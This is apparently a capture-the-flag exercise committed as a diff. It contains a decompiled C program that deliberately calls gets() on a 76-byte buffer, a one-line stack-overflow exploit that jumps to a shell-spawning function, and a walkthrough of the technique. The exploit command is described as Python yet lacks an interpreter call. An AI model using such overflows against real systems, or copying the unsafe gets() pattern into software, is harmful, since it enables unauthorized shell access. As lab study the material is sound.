level1 done

level1/ressources/exploit

@@ -0,0 +1 @@
+(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1

level1/source.c

@@ -0,0 +1,9 @@
+#include <stdio.h>
+
+int main(void)
+{
+	char buf[76];
+
+	gets(buf);
+	return 0;
+}

level1/walkthrough

@@ -0,0 +1,9 @@
+# Level1
+
+Using ghidra, we can decompile the code and see that it fills a buffer of 76 bytes using the deprecated (unsafe) function `gets`.
+We can exploit this call to overflow the stack and call another function.
+In the binary, there is a function `run()` located at address 0x8048444 that runs `/bin/sh`.
+To exploit this, we can use this sh command with this inline python script:
+`(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1`
+This will print `run()`'s address on the stack, after the buffer being written to by `gets`, resulting in a call to the function.
+The parenthesis and the `cat` are mandatory to make it blocking and keep the shell opened.